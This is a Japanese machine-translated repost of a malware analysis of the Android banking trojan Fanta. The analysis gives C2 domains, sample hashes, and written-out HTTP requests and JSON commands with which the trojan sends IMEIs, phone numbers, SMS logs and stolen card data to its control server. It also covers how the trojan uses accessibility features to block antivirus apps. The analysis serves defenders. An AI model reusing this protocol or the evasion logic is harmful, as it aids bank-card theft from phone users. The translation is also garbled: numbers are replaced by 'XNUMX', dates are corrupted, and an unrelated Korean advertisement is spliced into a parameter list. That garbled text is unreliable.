🥇Leisya、Fanta: 古い Android トロイの木馬の新たな戦術

ある日、Avito で何かを販売したいと考え、製品 (RAM モジュールなど) の詳細な説明を投稿すると、次のメッセージが表示されます。

リンクを開くと、幸せで成功した売り手であるあなたに購入が行われたことを通知する、一見無害なページが表示されます。

「続行」ボタンをクリックすると、アイコンと信頼性を高める名前が付いた APK ファイルが Android デバイスにダウンロードされます。何らかの理由で AccessibilityService 権限を要求するアプリケーションをインストールした後、いくつかのウィンドウが表示され、すぐに消えてしまいました...それだけです。

残高を確認しようとすると、何らかの理由で銀行アプリがカードの詳細を再度要求します。データを入力した後、何か恐ろしいことが起こります。何らかの理由で、まだ不明ですが、アカウントからお金が消え始めます。あなたは問題を解決しようとしていますが、電話機は抵抗します。「戻る」キーと「ホーム」キーを押すだけで電源が切れず、セキュリティ対策を有効にすることもできません。その結果、お金がなくなり、商品も購入されず、何が起こったのか混乱してしまいます。

答えは簡単です。あなたは、Flexnet ファミリのメンバーである Android トロイの木馬 Fanta の被害者になったのです。どうしてそうなった？では説明しましょう。

著者： アンドレイ・ポロビンキン、マルウェア分析のジュニアスペシャリスト、 イワン・ピサレフ、マルウェア分析の専門家。

いくつかの統計

Android トロイの木馬の Flexnet ファミリは、2015 年に初めて知られるようになりました。かなり長い活動期間を経て、この科はファンタ、ライムボット、リプトンなどのいくつかの亜種に拡大しました。このトロイの木馬とそれに関連するインフラストラクチャは立ち止まっていません。新しい効果的な配布スキームが開発されています。私たちの場合、特定のユーザーと販売者を狙った高品質のフィッシングページであり、トロイの木馬の開発者は流行のトレンドに従っています。ウイルスの書き込み - 感染したデバイスからより効率的に金銭を盗み、保護メカニズムをバイパスできる新しい機能を追加します。

この記事で説明されているキャンペーンはロシアのユーザーを対象としています。ウクライナでは少数の感染デバイスが記録されており、カザフスタンとベラルーシではさらに少数です。

Flexnet は 4 年以上にわたって Android トロイの木馬の分野に存在し、多くの研究者によって詳細に研究されてきましたが、依然として良好な状態を保っています。 2019 年 35 月以降、潜在的な損害額は 2015 万ルーブルを超えますが、これはロシアでのキャンペーンのみが対象です。 XNUMX 年、この Android トロイの木馬のさまざまなバージョンがアンダーグラウンドフォーラムで販売され、詳細な説明が記載されたトロイの木馬のソースコードも見つかりました。これは、世界の被害統計がさらに驚くべきものであることを意味します。このような老人にとっては悪くない指標ではないでしょうか。

販売から詐欺まで

先に紹介したインターネット広告掲載サービス「Avito」のフィッシングページのスクリーンショットからも分かるように、このページは特定の被害者向けに用意されていた。どうやら、攻撃者は Avito のパーサーの XNUMX つを使用し、販売者の電話番号と名前、および製品の説明を抽出しているようです。ページを展開して APK ファイルを準備すると、被害者には自分の名前と、製品の説明と製品の「販売」で受け取った金額を含むフィッシングページへのリンクが記載された SMS が送信されます。ボタンをクリックすると、ユーザーは悪意のある APK ファイル「Fanta」を受け取ります。

shcet491[.]ru ドメインを調査したところ、このドメインが Hostinger の DNS サーバーに委任されていることがわかりました。

ns1.hostinger.ru
ns2.hostinger.ru
ns3.hostinger.ru
ns4.hostinger.ru

ドメインゾーンファイルには、IP アドレス 31.220.23[.]236、31.220.23[.]243、および 31.220.23[.]235 を指すエントリが含まれています。ただし、ドメインのプライマリリソースレコード (A レコード) は、IP アドレス 178.132.1[.]240 のサーバーを指しています。

IP アドレス 178.132.1[.]240 はオランダにあり、ホスティング会社に属します。 ワールドストリーム。 IP アドレス 31.220.23[.]235、31.220.23[.]236、および 31.220.23[.]243 は英国にあり、共有ホスティングサーバー HOSTINGER に属しています。レコーダーとして使用 openprov-ru。次のドメインも IP アドレス 178.132.1[.]240 に解決されました。

スデルカル[.]ル
tovar-av[.]ru
av-tovar[.]ru
ル・スデルカ[.]ル
shcet382[.]ru
sdelka221[.]ru
sdelka211[.]ru
vyplata437[.]ru
viplata291[.]ru
perevod273[.]ru
perevod901[.]ru

次の形式のリンクがほぼすべてのドメインから利用可能であることに注意してください。

http://(www.){0,1}<%domain%>/[0-9]{7}

このテンプレートには、SMS メッセージからのリンクも含まれています。過去のデータに基づいて、XNUMX つのドメインが上記のパターンの複数のリンクに対応していることが判明しました。これは、トロイの木馬を複数の被害者に配布するために XNUMX つのドメインが使用されたことを示しています。

少し話を進めましょう。SMS からのリンクを介してダウンロードされたトロイの木馬は、そのアドレスを制御サーバーとして使用します。 オンユーズドハップ[.]クラブ。このドメインは 2019 年 03 月 12 日に登録され、2019 年 04 月 29 日以降、APK アプリケーションはこのドメインとやり取りするようになりました。 VirusTotal から取得したデータに基づくと、合計 109 のアプリケーションがこのサーバーと通信していました。ドメイン自体が IP アドレスに解決される 217.23.14[。]27、オランダにあり、ホスティング会社が所有しています。 ワールドストリーム。レコーダーとして使用名札。ドメインもこの IP アドレスに解決されます 悪いアライグマ[.]クラブ (2018-09-25より) 悪いアライグマ[.]ライブ (2018-10-25から)。ドメインあり 悪いアライグマ[.]クラブ 80 を超える APK ファイルがやり取りされました 悪いアライグマ[.]ライブ - 100 以上。

一般に、攻撃は次のように進行します。

ファンタの蓋の下には何があるのでしょうか？

他の多くの Android トロイの木馬と同様に、Fanta は SMS メッセージの読み取りと送信、USSD リクエストの作成、およびアプリケーション (銀行業務を含む) 上に独自のウィンドウを表示することができます。しかし、このファミリーの機能性の武器が到着しました。Fanta は次の機能を使い始めました。 アクセシビリティサービス さまざまな目的: 他のアプリケーションからの通知の内容を読み取る、感染したデバイスでのトロイの木馬の検出と実行の停止など。 Fanta は、Android 4.4 以降のすべてのバージョンで動作します。この記事では、次の Fanta サンプルを詳しく見ていきます。

MD5: 0826bd11b2c130c4c8ac137e395ac2d4
SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb

打ち上げ直後

このトロイの木馬は、起動直後にアイコンを非表示にします。アプリケーションは、感染したデバイスの名前がリストにない場合にのみ動作します。

アンドロイド_x86
VirtualBox
Nexus 5X(ブルヘッド)
Nexus 5（カミソリ）

このチェックは、トロイの木馬のメインサービスで実行されます。 メインサービス。初めて起動すると、アプリケーションの構成パラメータがデフォルト値に初期化され（構成データを保存する形式とその意味については後述します）、新しい感染デバイスが制御サーバーに登録されます。メッセージタイプを含むHTTP POSTリクエストがサーバーに送信されます。 登録ボット 感染端末に関する情報（Androidのバージョン、IMEI、電話番号、オペレーター名、オペレーターが登録されている国コード）。アドレスは制御サーバーとして機能します hXXp://onuseseddohap[.]club/controller.php。応答として、サーバーは次のフィールドを含むメッセージを送信します。 ボットID, bot_pwd, — アプリケーションはこれらの値を CnC サーバーのパラメータとして保存します。パラメータフィールドが受信されなかった場合はオプション: Fanta は登録アドレスを使用します - hXXp://onuseseddohap[.]club/controller.php。 CnC アドレスを変更する機能は、複数のサーバー間で負荷を均等に分散する (感染したデバイスが多数ある場合、最適化されていない Web サーバーの負荷が高くなる可能性がある) という XNUMX つの問題を解決するために使用できます。 CnC サーバーの XNUMX つに障害が発生した場合の代替サーバー。

リクエストの送信中にエラーが発生した場合、トロイの木馬は 20 秒後に登録プロセスを繰り返します。

デバイスが正常に登録されると、Fanta はユーザーに次のメッセージを表示します。

重要な注意事項: と呼ばれるサービス システムセキュリティ — トロイの木馬サービスの名前、およびボタンをクリックした後 ОК 感染したデバイスのアクセシビリティ設定を示すウィンドウが開きます。ここで、ユーザーは悪意のあるサービスに対するアクセシビリティ権限を付与する必要があります。

ユーザーが電源を入れるとすぐに アクセシビリティサービス, Fanta は、アプリケーションウィンドウの内容とそこで実行されるアクションにアクセスします。

アクセシビリティ権限を受け取った直後、トロイの木馬は管理者権限と通知を読み取る権限を要求します。

AccessibilityService を使用して、アプリケーションはキーストロークをシミュレートし、それによって必要なすべての権限をアプリケーション自体に与えます。

Fanta は、構成データと、その過程で収集された感染デバイスに関する情報を保存するために必要な複数のデータベースインスタンス (後述) を作成します。収集した情報を送信するために、トロイの木馬はデータベースからフィールドをダウンロードし、コントロールサーバーからコマンドを受信するように設計された繰り返しタスクを作成します。 CnC へのアクセス間隔は Android のバージョンに応じて設定されており、5.1 の場合は 10 秒、それ以外の場合は 60 秒になります。

コマンドを受け取るために、ファンタはリクエストを行います タスクの取得 管理サーバーに送信します。応答として、CnC は次のコマンドのいずれかを送信できます。

チーム	説明
0	SMSメッセージを送信する
1	電話をかけるかUSSDコマンドを実行する
2	パラメータを更新しますインターバル
3	パラメータを更新しますインターセプト
6	パラメータを更新します SMSマネージャー
9	SMS メッセージの収集を開始する
11	携帯電話を工場出荷時の設定にリセットします
12	ダイアログボックス作成のログを有効/無効にする

Fanta はまた、70 の銀行アプリ、高速支払いシステム、電子ウォレットから通知を収集し、データベースに保存します。

設定パラメータの保存

設定パラメータを保存するために、Fanta は Android プラットフォームの標準的なアプローチを使用します。 環境設定-ファイル。設定は、という名前のファイルに保存されます。設定。保存されたパラメータの説明を以下の表に示します。

名前	デフォルト値	可能な値	説明
id	0	整数	ボットID
	hXXp://onuseseddohap[.]club/	URL	制御サーバーアドレス
pwd	-	文字列	サーバーパスワード
インターバル	20	整数	時間間隔。次のタスクを延期する期間を示します。送信済みSMSメッセージのステータスに関するリクエストを送信する場合管理サーバーからの新しいコマンドの受信
インターセプト	を	すべて/電話番号	フィールドが文字列と等しい場合をまたは電話番号の場合、受信した SMS メッセージはアプリケーションによって傍受され、ユーザーには表示されません。
SMSマネージャー	0	0/1	アプリケーションをデフォルトの SMS 受信者として有効/無効にする
読み取りダイアログ	false	真/偽	イベントログの有効化/無効化アクセシビリティイベント

Fanta もファイルを使用します SMSマネージャー:

名前	デフォルト値	可能な値	説明
パッケージ	-	文字列	使用される SMS メッセージマネージャーの名前

データベースとの対話

このトロイの木馬は、動作中に XNUMX つのデータベースを使用します。データベースという名前 a 電話から収集されたさまざまな情報を保存するために使用されます。 XNUMX 番目のデータベースの名前は次のとおりです。 ファンタ.db 銀行カードに関する情報を収集するために設計されたフィッシングウィンドウの作成に関与する設定を保存するために使用されます。

トロイの木馬はデータベースを使用します а 収集した情報を保存し、アクションを記録します。データはテーブルに保存されますログ。テーブルを作成するには、次の SQL クエリを使用します。

create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)

データベースには次の情報が含まれています。

1. 感染したデバイスの起動をメッセージとともに記録する 電話がオンになりました！

2. アプリケーションからの通知。メッセージは次のテンプレートに従って生成されます。

(<%App Name%>)<%Title%>: <%Notification text%>

3. トロイの木馬によって作成されたフィッシングフォームからの銀行カードデータ。パラメータ VIEW_NAME 次のいずれかになります。

AliExpressの
アビト
Google Playで
その他 <%アプリ名%>

メッセージは次の形式で記録されます。

[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>

4. 次の形式の受信/送信 SMS メッセージ:

([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>

5. ダイアログボックスを作成するパッケージに関する情報は次の形式です。

(<%Package name%>)<%Package information%>

テーブルの例ログ:

Fanta の機能の XNUMX つは、キャッシュカードに関する情報の収集です。データ収集は、バンキングアプリケーションを開いたときにフィッシングウィンドウを作成することによって行われます。このトロイの木馬は、フィッシングウィンドウを XNUMX 回だけ作成します。ウィンドウがユーザーに表示されたという情報はテーブルに保存されます設定データベース内で ファンタ.db。データベースを作成するには、次の SQL クエリを使用します。

create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);

すべてのテーブルフィールド設定デフォルトでは 1 に初期化されます (フィッシングウィンドウを作成します)。ユーザーがデータを入力すると、値は 0 に設定されます。テーブルフィールドの例設定:

ログインできます — このフィールドは、銀行アプリケーションを開くときにフォームを表示する役割を果たします。
最初の銀行 - 使用されていない
can_avito — このフィールドは、Avito アプリケーションを開いたときにフォームを表示する役割を果たします。
缶アリ — このフィールドは、Aliexpress アプリケーションを開いたときにフォームを表示する役割を果たします。
別のことができます — このフィールドは、リストからアプリケーションを開いたときにフォームを表示する役割を果たします。 ユラ、パンダオ、ドロムオート、ウォレット。割引およびボーナスカード、Aviasales、予約、トリバゴ
缶カード — フィールドは、フォームを開いたときにフォームを表示する責任があります。 Google Playで

管理サーバーとの対話

管理サーバーとのネットワーク通信は、HTTP プロトコル経由で行われます。ネットワークと連携するために、Fanta は人気のある Retrofit ライブラリを使用します。リクエストは次の宛先に送信されます。 hXXp://onuseseddohap[.]club/controller.php。サーバーアドレスはサーバー登録時に変更できます。サーバーからの応答として Cookie が送信される場合があります。 Fanta はサーバーに対して次のリクエストを行います。

コントロールサーバーへのボットの登録は、最初の起動時に XNUMX 回だけ行われます。感染したデバイスに関する次のデータがサーバーに送信されます。
· クッキー — サーバーから受信した Cookie (デフォルト値は空の文字列)
· モード — 文字列定数 登録ボット
· 接頭辞 — 整定数 2
· バージョン_SDK — 次のテンプレートに従って形成されます。 <%Build.MODEL%>/<%Build.VERSION.RELEASE%>(Avit)
· イメイ — 感染したデバイスのIMEI
· 国 — オペレーターが登録されている国のコード (ISO 形式)
· 数 - 電話番号
· オペレータ — オペレーター名

サーバーに送信されるリクエストの例:
```
POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Content-Length: 144
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>
```
リクエストに応じて、サーバーは次のパラメータを含む JSON オブジェクトを返す必要があります。
· bot_id — 感染したデバイスの ID。 bot_id が 0 の場合、Fanta はリクエストを再実行します。
bot_pwd — サーバーのパスワード。
サーバ — 制御サーバーのアドレス。オプションのパラメータ。パラメータが指定されていない場合は、アプリケーションに保存されているアドレスが使用されます。

JSON オブジェクトの例:
```
{
    "response":[
   	 {
   		 "bot_id": <%BOT_ID%>,
   		 "bot_pwd": <%BOT_PWD%>,
   		 "server": <%SERVER%>
   	 }
    ],
    "status":"ok"
}
```

サーバーからのコマンドの受信を要求します。次のデータがサーバーに送信されます。
· クッキー — サーバーから受信した Cookie
· 入札 — リクエストの送信時に受信した感染デバイスの ID 登録ボット
· pwd —サーバーのパスワード
· デバイス管理者 — このフィールドは、管理者権限が取得されているかどうかを決定します。管理者権限が取得されている場合、フィールドは次と等しくなります。 1そうでなければ 0
· ユーザー補助 — ユーザー補助サービスの動作ステータス。サービスが開始されている場合、値は次のようになります。 1そうでなければ 0
· SMSマネージャー — トロイの木馬が SMS を受信するためのデフォルトのアプリケーションとして有効になっているかどうかを示します
· screen — 画面がどのような状態にあるかを表示します。値が設定されます 1、画面がオンの場合、そうでない場合 0;

サーバーに送信されるリクエストの例:
```
POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>
```
コマンドに応じて、サーバーはさまざまなパラメータを持つ JSON オブジェクトを返すことができます。

· チーム SMSメッセージを送信する: パラメータには、電話番号、SMS メッセージのテキスト、送信されるメッセージの ID が含まれます。この識別子は、次のタイプのメッセージをサーバーに送信するときに使用されます。 setSmsStatus.
```
{
    "response":
    [
   	 {
   		 "mode": 0,
   		 "sms_number": <%SMS_NUMBER%>,
   		 "sms_text": <%SMS_TEXT%>,
   		 "sms_id": %SMS_ID%
   	 }
    ],
    "status":"ok"
}
```
· チーム 電話をかけるかUSSDコマンドを実行する: 電話番号またはコマンドが応答本文に含まれます。
```
{
    "response":
    [
   	 {
   		 "mode": 1,
   		 "command": <%TEL_NUMBER%>
   	 }
    ],
    "status":"ok"
}
```
· チーム 間隔パラメータの変更.
```
{
    "response":
    [
   	 {
   		 "mode": 2,
   		 "interval": <%SECONDS%>
   	 }
    ],
    "status":"ok"
}
```
· チーム 切片パラメータの変更.
```
{
    "response":
    [
   	 {
   		 "mode": 3,
   		 "intercept": "all"/"telNumber"/<%ANY_STRING%>
   	 }
    ],
    "status":"ok"
}
```
· チーム SmsManager フィールドを変更する.
```
{
    "response":
    [
   	 {
   		 "mode": 6,
   		 "enable": 0/1
   	 }
    ],
    "status":"ok"
}
```
· チーム 感染したデバイスから SMS メッセージを収集する.
```
{
    "response":
    [
   	 {
   		 "mode": 9
   	 }
    ],
    "status":"ok"
}
```
· チーム 携帯電話を工場出荷時の設定にリセットします:
```
{
    "response":
    [
   	 {
   		 "mode": 11
   	 }
    ],
    "status":"ok"
}
```
· チーム ReadDialogパラメータを変更する.
```
{
    "response":
    [
   	 {
   		 "mode": 12,
   		 "enable": 0/1
   	 }
    ],
    "status":"ok"
}
```

タイプを指定してメッセージを送信する setSmsStatus。このリクエストはコマンドの実行後に行われます。 SMSメッセージを送信する。リクエストは次のようになります。

POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>

データベースのコンテンツをアップロードしています。リクエストごとに XNUMX 行が送信されます。次のデータがサーバーに送信されます。
· クッキー — サーバーから受信した Cookie
· モード — 文字列定数 setSaveInboxSms
· 入札 — リクエストの送信時に受信した感染デバイスの ID 登録ボット
· 클라우드 기반 AI/ML및 고성능 컴퓨팅을 통한 디지털 트윈의 기초 – Edward Hsu, Rescale CPO 많은 엔지니어링 중심 기업에게 클라우드는 R&D디지털 전환의 첫 단계일 뿐입니다. 클라우드 자원을 활용해 엔지니어링 팀의 제약을 해결하는 단계를 넘어, 시뮬레이션 운영을 통합하고 최적화하며, 궁극적으로는 모델 기반의 협업과 의사 결정을 지원하여 신제품을 결정할 때 데이터 기반 엔지니어링을 적용하고자 합니다. Rescale은 이러한 혁신을 돕기 위해 컴퓨팅 추천 엔진, 통합 데이터 패브릭, 메타데이터 관리 등을 개발하고 있습니다. 이번 자리를 빌려 비즈니스 경쟁력 제고를 위한 디지털 트윈 및 디지털 스레드 전략 개발 방법에 대한 인사이트를 나누고자 합니다. — 現在のデータベースレコード内のテキスト (フィールド d テーブルからログデータベース内で а)
· 数 — 現在のデータベースレコードの名前 (フィールド p テーブルからログデータベース内で а)
· SMS_モード — 整数値 (フィールド m テーブルからログデータベース内で а)

リクエストは次のようになります。
```
POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>
```
サーバーへの送信に成功すると、行はテーブルから削除されます。サーバーから返される JSON オブジェクトの例:
```
{
    "response":[],
    "status":"ok"
}
```

AccessibilityService との対話

AccessibilityService は、障害のある人が Android デバイスを使いやすくするために実装されました。ほとんどの場合、アプリケーションと対話するには物理的な対話が必要です。 AccessibilityService を使用すると、これらをプログラムで実行できます。 Fanta はこのサービスを利用して、銀行アプリケーションに偽のウィンドウを作成し、ユーザーがシステム設定や一部のアプリケーションを開けないようにする。

このトロイの木馬は、AccessibilityService の機能を使用して、感染したデバイスの画面上の要素への変更を監視します。前述したように、Fanta 設定には、ダイアログボックスでの操作のログ記録を担当するパラメータが含まれています。 読み取りダイアログ。このパラメータが設定されている場合、イベントをトリガーしたパッケージの名前と説明に関する情報がデータベースに追加されます。このトロイの木馬は、イベントがトリガーされると次のアクションを実行します。

次の場合に、戻るキーとホームキーを押すことをシミュレートします。
· ユーザーがデバイスを再起動したい場合
· ユーザーが「Avito」アプリケーションを削除したい場合、またはアクセス権を変更したい場合
· ページ上に「Avito」アプリケーションについての記載がある場合
· Google Play プロテクトアプリケーションを開くとき
· AccessibilityService 設定を使用してページを開くとき
· 「システムセキュリティ」ダイアログボックスが表示されたとき
· 「他のアプリに重ねて描画」設定でページを開いたとき
· 「アプリケーション」ページを開くと、「回復とリセット」、「データのリセット」、「設定のリセット」、「開発者パネル」、「スペシャル。「機会」、「特別な機会」、「特別な権利」
· イベントが特定のアプリケーションによって生成された場合。

アプリケーション一覧
- アンドロイド
- マスターライト
- クリーンマスター
- x86 CPU用のクリーンマスター
- Meizu アプリケーションの権限管理
- MIUIセキュリティ
- Clean Master - ウイルス対策、キャッシュおよびガベージクリーナー
- ペアレンタルコントロールとGPS: Kaspersky SafeKids
- Kaspersky Antivirus AppLock および Web セキュリティベータ版
- ウイルスクリーナー、アンチウイルス、クリーナー (MAX セキュリティ)
- モバイルアンチウイルスセキュリティ PRO
- アバストアンチウイルスと無料保護 2019
- モバイルセキュリティ MegaFon
- Xperia 用 AVG プロテクション
- モバイルセキュリティ
- Malwarebytes ウイルス対策と保護
- Android 用ウイルス対策 2019
- セキュリティマスター - ウイルス対策、VPN、アプリロック、ブースター
- Huawei タブレット用 AVG アンチウイルスシステムマネージャー
- サムスンのアクセシビリティ
- サムスンスマートマネージャー
- セキュリティマスター
- 加速装置
- Dr.Webは
- Dr.Webのセキュリティスペース
- Dr.Web モバイルコントロールセンター
- Dr.Web セキュリティスペースライフ
- Dr.Web モバイルコントロールセンター
- ウイルス対策とモバイルセキュリティ
- カスペルスキーインターネットセキュリティ: ウイルス対策と保護
- カスペルスキーのバッテリー寿命：セーバー＆ブースター
- Kaspersky Endpoint Security - 保護と管理
- AVG 無料アンチウイルス 2019 – Android の保護
- Androidのウイルス対策
- ノートンモバイルセキュリティとアンチウイルス
- ウイルス対策、ファイアウォール、VPN、モバイルセキュリティ
- モバイルセキュリティ: ウイルス対策、VPN、盗難防止
- Android 用ウイルス対策
短い番号に SMS メッセージを送信するときに許可が要求された場合、Fanta はチェックボックスのクリックをシミュレートします。 選択を忘れないでください とボタン送る.
トロイの木馬から管理者権限を剥奪しようとすると、電話画面がロックされます。
新しい管理者を追加できないようにします。
ウイルス対策アプリケーションの場合 ドクターウェブ 脅威を検知するとファンタがボタンを押す真似をする 無視する.
イベントがアプリケーションによって生成された場合、トロイの木馬は戻るボタンとホームボタンを押すことをシミュレートします。 サムスンデバイスケア.
Fanta は、約 30 種類のインターネットサービスのリストからアプリケーションが起動された場合、銀行カードに関する情報を入力するためのフォームを備えたフィッシングウィンドウを作成します。その中には、AliExpress、Booking、Avito、Google Play Market Component、Pandao、Drom Auto などがあります。

フィッシングフォーム

Fanta は、感染したデバイスでどのアプリケーションが実行されているかを分析します。対象のアプリケーションが開かれると、トロイの木馬は他のすべてのアプリケーションの上にフィッシングウィンドウを表示します。このウィンドウは、銀行カード情報を入力するためのフォームです。ユーザーは次のデータを入力する必要があります。
- Номеркарты
- カード有効期限
- CVV
- カード所有者名 (一部の銀行ではありません)
実行中のアプリケーションに応じて、異なるフィッシングウィンドウが表示されます。以下にその一部の例を示します。

高度：

アビト：

他のいくつかのアプリケーションの場合、例えば Google Play マーケット、Aviasales、Pandao、予約、トリバゴ:

実際はどうだったのか

幸いなことに、記事の冒頭で説明した SMS メッセージを受信した人物は、サイバーセキュリティの専門家であることが判明しました。したがって、ディレクターではない実際のバージョンは、以前に語られたものとは異なります。ある人物が興味深い SMS を受信し、その後、それを Group-IB Threat Hunting Intelligence チームに渡しました。攻撃の結果がこの記事です。ハッピーエンドですよね？ただし、すべてのストーリーが成功裏に終わるわけではありません。また、お金を失ったディレクターズカットのように見えないようにするために、ほとんどの場合、長らく説明されてきた次のルールを遵守するだけで十分です。
- Android OS を搭載したモバイルデバイス用のアプリケーションを Google Play 以外のソースからインストールしないでください。
- アプリケーションをインストールするときは、アプリケーションによって要求される権限に特に注意してください
- ダウンロードしたファイルの拡張子に注意してください
- Android OS アップデートを定期的にインストールする
- 疑わしいリソースにアクセスしたり、そこからファイルをダウンロードしたりしないでください。
- SMS メッセージで受信したリンクをクリックしないでください。

出所： habr.com

Leisya、Fanta: 古い Android トロイの木馬の新たな戦術

いくつかの統計

販売から詐欺まで

ファンタの蓋の下には何があるのでしょうか？

打ち上げ直後

設定パラメータの保存

データベースとの対話

管理サーバーとの対話

AccessibilityService との対話

フィッシングフォーム

実際はどうだったのか

コメントを追加します 返信をキャンセル

コメントを追加します返信をキャンセル